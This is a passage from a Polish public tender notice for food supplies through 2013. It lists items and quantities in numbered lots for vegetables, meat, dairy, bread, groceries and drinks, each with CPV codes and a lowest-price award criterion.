fasola jaś	kg	15
fasola szparagowa	kg	3
groch cały 0,4	kg	3
groch łuska 0,4 kg	szt	10
groch łuskany 5kg	kg	2
jarmuz	kg	2
kabaczek	kg	2
kapusta czerwona	kg	20
kapusta młoda	szt	80
kapusta	kg	30
kapusta pekińska	kg	80
kapusta pekińska	szt	15
kapusta włoska	kg	5
kalafior	szt	3
koper	szt	45
koper duży	szt	3
marchew młoda	kg	30
marchew myta	kg	140
ogórek gruntowy	kg	10
ogórek świeży	kg	50
papryka świeża	kg	30
pietruszka korzeń	kg	40
pomidor	kg	65
por	szt	15
por	kg	20
rzodkiewka pęczki	szt	80
sałata	szt	25
sałata dekoracyjna	szt	30
sałata lodowa	szt	13
seler	kg	40
seler naciowa	szt	5
szczypiorek	szt	27
szparagi	kg	6
zielenina natka	szt	60
ziemniaki młode	kg	120
ziemniaki	kg	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chrzan tarty 160g	szt	24
chrzan z żurawiną	szt	2
cebulka konserwowa 300g	szt	4
fasolka czerwona konserw.	szt	5
groszek konserwowy 400g	szt	25
groszek z marchewką 0,9l	szt	4
kapusta kiszona  5kg	szt	4
koncentrat pomidorowy 0,9l	szt	13
koncentrat pomidorowy 1l	szt	2
kukurydza konserwowa	szt	30
kukurydza kons. 0,9 l	szt	2
oliwki 200ml	szt	10
oliwki ciemne	szt	10
ogórki kiszone 3kg	kg	5
ogórki małosolne	kg	12
ogórki konserwowe 0,9l	szt	30
papryka konserwowa 0,9l	szt	25
pieczarka	kg	24
pieczarka konserwowa 0,9l	szt	24
pieczarka solona 0.9	szt	2
pieczarka solona 3000ml	szt	1
seler w słoiku 0,250	szt	4
Surówka 3 kg	szt	2
szczaw konserwowy 0,9l	szt	24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brukselka mroż 0.5 kg	szt	10
brukselka mroż. 2,5 kg	kg	10
brokuły mroż. 2,5 kg	kg	10
frytki  1kg	szt	18
Frytki 1,5 kg	kg	6
Frytki 2 kg	kg	8
groszek mrozony	kg	15
groszek mrozony 2,5 kg	kg	10
hamburger mrozony	szt	150
kalafior mroz 2,5 kg	szt	2
kalafior mroż	kg	25
marchew mini 2,5 kg	szt	2
marchew kostka 2,5 kg	szt	2
marchew kostka mroż	kg	100
marchew z groszkiem 2,5 kg	szt	2
marchew z groszkiem mroż	kg	25
mieszanka kompotowa	kg	5
pizza 250g	szt	90
pyzy z mięsem  	kg	80
pyzy z owocami (knedle)	kg	20
szpinak	kg	5
truskawki mrozone	kg	2
warzywa na patelnię	kg	10
warzywa na pat.chinskie	kg	5
zapiekanka 200g	szt	120
zupa wiosenna	kg	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja	szt	750.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> boczek świeży	kg	3
flaki wieprzowe	kg	5
flaki wołowe	kg	2
golonka wieprz b/k	kg	5
golonka wiep z kością	kg	5
karkówka wieprz b/k	kg	30
karkówka wieprz z/k	kg	7
kości wieprzowe	kg	15
łopatka b/k	kg	67
łopatka z kością	kg	4
mięso gulaszowe	kg	4
ozory wieprzowe	kg	3
polędwica wieprzowa (Mięso)	kg	2
rozbeft wołowy	kg	1
schab wiep b/k	kg	20
schab wiep z/k	kg	3
słonina	kg	2
szynka wiep b/k	kg	6
wątroba wieprzowa	kg	5
wołowina gulaszowa	kg	2
wołowina zrazowa	kg	3
żeberka wiep	kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.10-9, 15.13.11.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 - drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ćwiartki tylne drobiowe	kg	10
filet drobiowy	kg	4
filet z piersi kurczaka	kg	30
korpusy drobiowe(grzbiety)	kg	72
kurczak świe.	kg	10
serca drobiowe	kg	5
skrzydełka z kurczaka	kg	6
udka	kg	90
wątroba drobiowa	kg	5
żołądki drobiowe	kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.10-9, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9 - wędliny i prod. wędliniarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baleron wieprzowy	kg	8
boczek wędzony gotowany	kg	2
boczek wędzony surowy	kg	1
boczek rolada	kg	5
kabanosy leśne  lub równoważne	kg	3
kiełbasa biała parzona	kg	3
kiełbasa biała  surowa	kg	3
kiełbasa codzienna  lub równoważna	kg	9
kiełbasa golonkowa	kg	6
kiełbasa śląska  lub równoważna	kg	10
kiełbasa toruńska  lub równoważna	kg	10
kiełbasa typu mysliwska  lub równoważna	kg	5
kiełbasa typu ogniskowa  lub równoważna	kg	10
kiełbasda piwna	kg	20
kiełbasa szynkowa	kg	40
kiełbasa zwyczajna	kg	35
kiełbasa z weka  lub równoważna	kg	6
kiełbasa typu krakowska  lub	kg	8
kiełbasa typu krakowska parzona  lub równoważne	kg	8
kiełbasa typu zywiecka lub równoważna	kg	8
królewiecka  lub równoważna	kg	15
metka cebulowa 200g	szt	20
metka łososiowa	kg	3
metka inna typu wiejska  lub równoważna	kg	6
mielonka wędlina	kg	4
mielonk a z warzywami	kg	5
mortadela	kg	1
ogonówka	kg	10
parówka hot-dog drobiowa	kg	3
parówka w folii	kg	15
parówka wiedenska  lub równoważna	kg	9
pasztetowa  domowa	kg	6
pasztetowa  śmietankowa  lub równoważne	kg	3
pasztet drobiowy	kg	3
pierś z kurczaka wędlina	kg	15
polędwica drobiowa	kg	6
polędwica drobiowa lux	kg	5
polędwica sopocka drobiowa  lub równoważne	kg	8
polędwica indyk	kg	5
polędwica wieprz.(wędlina)	kg	5
przysmak w konserwie	kg	3
przysmak śniadaniowy	kg	5
salami	kg	4
salceson biały typu włoski  lub równoważny	kg	2
salceson czarny ozorkowy	kg	2
serdelki	kg	4
smaczek konserwowy	kg	8
szynka drobiowa	kg	12
szynka mielona	kg	4
szynka konserwowa	kg	4
szynkowa	kg	25
szynka typu szynka żołniers  lub równoważna	kg	6
szynka z warzywami	kg	15
szynkówka kiełbasa	kg	25
tyrolska  lub równoważna	kg	5
wędlina z warzywami	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10 - pasztety i konserwy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> gulasz angielski 120g	szt	86
pasztet131 g koperek/majer./papryka/pieczar/pomid	szt	175
przysmak śniadaniowy 130g	szt	175
przysmak śniadaniowy 300g	szt	43
turystyczna  135g	szt	86
turystyczna 300g	szt	43
tyrolska 135g	szt	86
tyrolska 300g	szt	43.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11 - rybi i przetwory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z mintaja	kg	5
łosoś sałatkowy 200g	szt	5
lłosoś wędzony	kg	3
matijas	kg	5
mintaj wędzony	kg	2
morszczuk filet	kg	5
paluszki rybne	kg	5
panga	kg	6
paprykarz 156g	szt	5
pstrąg świe.	kg	5
szprot w pomidorach 300g	szt	5
śledż św. Filet	kg	3
śledź w pomidorach 300g	szt	5
tuńczyk  w sosie wł. 170G	szt	5
tunczyk w oleju 170g	szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12- pieczywo i ciasto.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chleb krojony0,6kg	szt	500
chleb forma 0.5	szt	25
chleb forma 1kg	szt	3
chleb słonecznikowy 0,5	szt	5
chleb  Z ZIARNAMI 0.5	szt	5
chleb razowy 0,5	szt	5
chleb wiejski 1kg	szt	5
ciastka drożdżowe 100g	szt	90
ciasta różne	kg	4
bułki 100g	szt	50
bułki 50g	szt	300
bułki hamburger 100G	szt	60
rogal 100g	szt	90
pączki 70g	szt	90
ciastka francuskie 60G	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13 - produkty skrobi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza manna	kg	5
kasza gryczana 4x100g	szt	2
kasza gryczana 1kg	szt	2
kasza jęczm. drobna	kg	2
kasza jęczm. Średnia	kg	3
kasza jęczm. Średnia 5kg	szt	1
kasza pęczak	kg	3
mąka krupczatka	kg	3
mąka pszenna typu 500	kg	10
mąka pszenna typu 450	kg	20
mąka ziemiaczna	kg	5
płatki owsiane 400	kg	3
płatki kukurydz. 250G	szt	5
platki kukur. 500 g	szt	5
platki kuku.kakaowe 250g	szt	5
platki kukur.kulki 500g	szt	10
płatki typu  chocapic	szt	8
płatki 500g typu kangus	szt	8
ryż 1kg typu uncle bens	szt	3
ryż w woreczkach 0,5kg	szt	3
ryż 1kg	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14 - produkty spożywcze różne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baton   	szt	30
baton	szt	30
bato typu lion	szt	30
baton typu snikers	szt	30
barszcz czerwony 220ml	szt	19
bialy barszcz	szt	18
budyń	szt	30
ciastka w polewie	kg	4
ciastka kruche	kg	4
ciastka typy pierniki	kg	4
ciastka typu wafelki	kg	4
Ciastka-rolada  300g	szt	7
cukier	kg	50
cukier puder  0,4 kg	szt	3
cukier waniliowy	szt	20
cukier kostka	kg	1
cukierki czekoladowe	kg	4
cukierki typu krówki	kg	4
cukierki typu szklaki	kg	4
cukierki owocowe	kg	4
cynamon 0,20g	szt	8
czekolada z orzechami	szt	30
czekolada nadziewana	szt	30
czipsy	szt	30
draże mleczne	szt	30
drożdże 100g	szt	10
galaretka owocowa	szt	27
gofry500g	szt	30
herbata expres 100 szt	szt	3
herbata expres 40 szt	szt	5
herbata expr. Mietowa 20szt	szt	1
hebata expres owocowa 25szt	szt	1
herbata granulowana 100g	szt	2
herbata owoc.rozpusz gran.	szt	3
herbata czarna 100szt  	szt	4
herbata czarna 50 szt 	szt	2
herbata zielona expre25szt	szt	2
jarzynka 200g	szt	5
jarzynka 1kg	szt	6
Jarzynka 0,5 kg	szt	2
Kawa zboż-expr.	szt	5
kawa rozpuszczalna zboż	szt	7
kawa rozpusz. 200g  	szt	3
kawa rozpuszcz. 100g   	szt	5
kawa rozpuszczalna zboż	szt	5
kawa naturalna mielona 250g	szt	2
kawa naturalna mielona 500g	szt	2
kawa rozpuszczalna 250g	szt	6
kawa rozpuszczalna 500g 	szt	4
kakao rozpuszczalne 350g	szt	10
keczup 500g	szt	17
keczup pikantny 0.5	szt	8
Keczup 1 l	szt	3
keczup wiadro	szt	1
kisiel	szt	22
kisiel 	szt	30
kminek 20g	szt	5
kotlety sojowe  0,35	szt	5
kotlety sojowe 0,5	szt	3
krem czekoladowy 200g	szt	67
krem czekoladowy 400g	szt	5
krem czekolad. Orzechowy	szt	10
krem czek 250	szt	10
kurkuma	szt	5
kwasek cytrynowy	szt	15
kwasek cytrynowy 0,5kg	szt	1
liść laurowy 20g	szt	8
liść laurowy 500g	szt	2
lizaki okrągłe	szt	30
lizak	szt	30
lizak 	szt	30
magi w plynie 1 l	szt	5
mak -puszka 500g	szt	2
makaron nitki  0.5 kg	szt	8
makaron gniazda 1kg	szt	8
makar. gniaz. 0,4kg	szt	8
makaron kokardy	kg	1
makaron łazanki	szt	5
makaron rurki 1 kg	szt	5
makaron 	szt	5
makaron świderki 1kg	szt	5
makaron spagetti 0,5kg	szt	15
makaron zacierka 250	szt	10
majeranek 20g	szt	10
majeranek 150g	szt	3
majeranek 500g	szt	1
majonez sałatkowy 350g	szt	6
majonez  sałatkowy 700g	szt	14
majonez sałatkowy 900g	szt	3
majonez sałatkowy 3kg	szt	1
majonez majonez  5kg	szt	1
miód sztuczny 200g	szt	2
miód sztuczny  5kg	szt	1
Miód naturalny 400g l	szt	1
musztarda	szt	10
musztrda tuba 0.5 l	szt	5
musztarda 1l	szt	1
Ocet 10%	szt	16
paluszki solone 0,400g	szt	30
paluszki	szt	30
paluszki z sezamem	szt	30
papryka mielona 20g	szt	17
papryka mielona słodka1kg	szt	2
papryka miel. Pikantna 1kg	szt	2
pieprz mielony 20g	szt	10
pieprz mielony 1000g	szt	2
pieprz w ziarnkach 20g	szt	5
pieprz w ziarnkach 1kg	szt	1
pieprz ziolowy 20g	szt	5
pieprz ziolowy 1 kg	szt	1
polewa do lodów 1 l	szt	5
polewa do lodów 200g	szt	3
proszek do pieczenia	szt	20
przyprawa gyros 20	szt	10
przyprawa gyros 0,700g	szt	1
przyprawa do bigosu 0,3	szt	10
przyprawa do grilla 20g	szt	10
przyprawa do grilla 1kg	szt	1
przyprawa do kurczaka 1 kg	szt	4
przyprawa do kurczaka	szt	10
przyprwa do ryb 20g	szt	10
przyprawa do ryb 600g	szt	2
puure ziemn. z boczkiem	szt	30
rosół drobiowy słoik	szt	10
rosól drobiowy 1 kg	szt	6
rosół drobiowy kost.	szt	7
soda spożywcza	szt	3
sos typy bolones 0,500l	szt	6
sos chili 1l	szt	1
sos czosnkowy 1 l	szt	1
sos czosnkowy 250ml	szt	4
sos do deserów 1 l	szt	5
sos do hamburgerow 1 l	szt	2
sos do spagetti 500 słoik	szt	10
sos bolone 1 kg	szt	1
sos neapoli 1kg	szt	1
sos mix koper-zioł, włoski itp 0,700	szt	2
sos salatkowy mix 700g	szt	2
sos słodko-kwaśny 500	szt	15
sos sojowy 1l	szt	2
sos sojowo-grzybowy	szt	1
sól	kg	12
sól konserwowa	kg	5
Wafle-miseczki	szt	100
wafelek duży(wafel z kremem typu murzynek)	szt	30
wafelek mały(wafel z kremem typu murzynek)	szt	30
wafelek w polewie	szt	30
wafelek  w polewie	opk	1
wafelek batonik w polewie jasnej	szt	30
wafelek batonik w polewie czekoladowej	opk	1
warzywko 200g	szt	5
warzywko 500g	szt	3
Warzywko 1 kg	szt	3
wiórki kokosowe 0,25	szt	3
Zasmazka 1 kg	szt	1
ziele angielskie	szt	5
ziele angielskie 600g	szt	2
zupki typu chińska(ostra,łagodna rosołowa itp.)	szt	30
zupki typu chiska(rosołowa-ostra/lagodna,krabowa itp.)	szt	30
zupki typu chińska(pomidorowa, barszcz,itp)	szt	30
zelatyna 50g	szt	10
Żelatyna 1 kg	szt	1
żurek w butelce	szt	10
zurek w proszku	szt	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie nr 15- oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> margaryna z masłem lub równoważny	szt	45
margaryna typu  0,5 kg  lub równoważna	szt	12
masło roślinne 200g	szt	5
oliwa z oliwek 1 l	szt	12
olej 1l	szt	50
olej 3l	szt	3
olej 5l	szt	2
smalec	kg	2
smalec 200g	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.43.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie nr 16 - produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> deser mleczno owocowy 125-150g	kg	60
deser typu monte  lub równoważny	opk	60
jogurt pitny 150-200	l	60
jogurt ze zbożami/musli 200-250	kg	60
jogurt typu gratka lub równoważny	szt	60
jogurt typu jogutek lub równoważny	szt	60
jogurt typu serduszko  lub równoważny	szt	60
lody 100g	szt	30
Lody-rolada 1l	szt	12
1lody 1,5 l	szt	4
Kefir 0,2-0,4l	l	90
Masło . 200G	szt	50
maślanka owocowa 0,3-0,45l	l	90
Mleko  UHT 2% 1l	szt	20
Mleko UHT 3,2% 1l	szt	120
ser feta	szt	13
serek grani 0,18-0,2	kg	90
serek homogenizowany 125-150g	kg	90
serek kanapk. Twarożk. 120-220g	kg	60
serek twaroż. Typu almette  lub równoważny	szt	67
ser twarogowy 200-250g	kg	20
ser twarogowy półtusty	kg	5
set topiony kostka q100g	szt	40
ser topiony -kielbaski 100	szt	40
ser top. Krążek 200	szt	50
ser topiony zegar 140-160g	kg	50
ser salami	kg	4
ser wędzony	kg	4
ser żółty typu edamski	kg	3
ser żółty typu królewski	kg	3
ser żółty typu morski	kg	3
ser żółty typu szwajcar	kg	12
śmietanka jednoraz. 10Szt	szt	50
śmietana w spray 0,5	szt	15
Śmietankaa 18% 0,2-0,5 l	l	16
Śmietanka 18% 1l	szt	4
Śmietanka 30% 0,2- 0,5 l	szt	10
Smietanka 30% 1l	szt	10
Śmietana 30% 1 l	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie nr 17 - napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> napoje gazowane 1,5 l	szt	6
napoje niegazowane 1,5 l	szt	6
napój gazowany 2l	szt	4
napój n/g 2 l	szt	4
napój owocowy	szt	30
napój 	szt	30
napój energetyczny	szt	20
Woda mineral. 0,5 gaz	szt	20
Woda mineralna 0,5 n/g	szt	20
Woda mineralna n/g 0,5 l typu	szt	20
woda mineral. G 0,5 l typu	szt	20
woda mineral. n/g 1,5 l typu	szt	12
Woda mineralna g 1,5 l typu	szt	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadanie nr 18 - owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas owoc	szt	5
arbuz	kg	20
banany	kg	30
brzoskwinie	kg	15
cytryny	kg	10
gruszki	kg	10
jabłka	kg	50
kiwi	kg	5
maliny	kg	3
mandarynki	kg	20
nektaryny	kg	20
pomarancza	kg	20
rabarbar	kg	10
truskawki	kg	12
winogrona ciemne	kg	10
winogrona jasne	kg	17
wisnie	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zadanie nr 19 - owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowany puszka	szt	20
brzoskwinia konserwowa puszka	szt	30
Dżem  słoik	szt	50
kompot truskawkowy 0,9 l	szt	9
marmolada owocowa 7kg	szt	2
rodzynki suszone 0.5 kg	szt	3
rodzynki suszone 100g	szt	30
sok owocowy 1l karton	szt	10
sok owocowy 2l karton	szt	20
syrop owocowy 1l 	szt	30
syrop owocowy 6,5l 	szt	0
śliwki suszone 250g	szt	10
żurawina	szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zadanie nr 20 - warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brokuł	szt	3
burak	kg	80
cebula	kg	80
cebula czerwona 	kg	6
czosnek	szt	20
fasola drobna 0,5 kg	szt	10
fasola jaś	kg	3
fasola jaś 0,5kg	szt	7
fasola szparagowa	kg	7
groch łuska	kg	8
kalafior	szt	10
kapusta 	kg	25
kapusta czerwona	kg	5
kapusta młoda 	szt	17
kapusta pekińska	szt	15
koper	szt	40
marchew myta	kg	80
ogórek świeży	kg	30
papryka świeża	kg	13
pietruszka korzeń	kg	5
pomidor	kg	40
por 	kg	25
rzodkiewka pęczki	szt	25
sałata	szt	40
sałata dekoracyjna	szt	5
sałata lodowa	szt	5
seler	kg	27
szczypiorek	szt	20
zielenina natka	szt	40
ziemniaki 	kg	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zadanie nr 21 - warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> cebulka konserwowa 300g	szt	5
chrzan tarty słoik	szt	3
chrzan z żurawiną	szt	3
fasolka czerwona konserwowa	szt	5
groszek konserwowy 400g	szt	27
groszek z marchewką 0,9l	szt	5
kapusta kiszona 	kg	30
koncentrat pomidorowy 0,9l	szt	15
kukurydza konserwowa	szt	15
ogórki kiszone	kg	15
ogórki konserwowe 0,9l	szt	20
ogórki małosolne	kg	15
oliwki czarne 	szt	2
oliwki zielone 200ml	szt	2
papryka konserwowa 0,9l	szt	15
pieczarka	kg	15
pieczarka konserwowa 0,9l	szt	10
seler w słoiku 0,250	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zadanie nr 22 - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brokuły mroż. 2,5 kg	szt	5
brukselka mroż 0.5 kg	szt	3
Frytki 2 kg	szt	7
marchew z groszkiem 2,5 kg	szt	2
szpinak 1kg	szt	10
truskawki mrozone	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zadanie nr 23 - jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja	szt	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Zadanie nr 24 - mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baleron wieprzowy	kg	5
boczek świeży	kg	2
boczek wędzony surowy	kg	10
ćwiartki tylne drobiowe	kg	15
filet królewski z indyka	kg	10
filet z piersi kurczaka	kg	40
flaki wołowe 1 kg	szt	7
golonka wieprz b/k	kg	5
kabanosy 	kg	5
karkówka wieprz b/k 	kg	50
kiełbasa  krakowska  lub równoważna	kg	8
kiełbasa  krakowska parzona  lub równoważne	kg	8
kiełbasa  mysliwska  lub równoważna	kg	13
kiełbasa biała  surowa	kg	40
kiełbasa szynkowa	kg	25
kiełbasa śląska  lub równoważna	kg	20
kiełbasa toruńska  lub równoważna	kg	30
kiełbasa z weka  lub równoważna	kg	7
kiełbasa zywiecka lub równoważna	kg	20
korpusy drobiowe(grzbiety)	kg	50
kości wieprzowe	kg	15
królewiecka  lub równoważna	kg	10
kurczak świeży	kg	15
łopatka b/k	kg	50
martadela	kg	10
metka inna  wiejska  lub równoważna	kg	5
metka łososiowa 	kg	5
mielonka konserwowa	kg	10
mięso gulaszowe	kg	15
ogonówka 	kg	10
parówka w folii	kg	10
parówka wiedenska  lub równoważna	kg	10
pasztetowa  domowa	kg	5
polędwica drobiowa	kg	7
polędwica sopocka   lub równoważne	kg	10
polędwica szkolna  lub równoważna	kg	5
przysmak śniadaniowy 130g	szt	10
schab wiep b/k	kg	35
serdelki	kg	10
szynka konserwowa 	kg	5
szynka mielona	kg	3
szynka wiep b/k	kg	15
turystyczna  lub równoważna	szt	15
tyrolska  lub równoważna	kg	10
udka	kg	30
wątroba drobiowa	kg	7
wątroba wieprzowa	kg	7
wołowina zrazowa	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
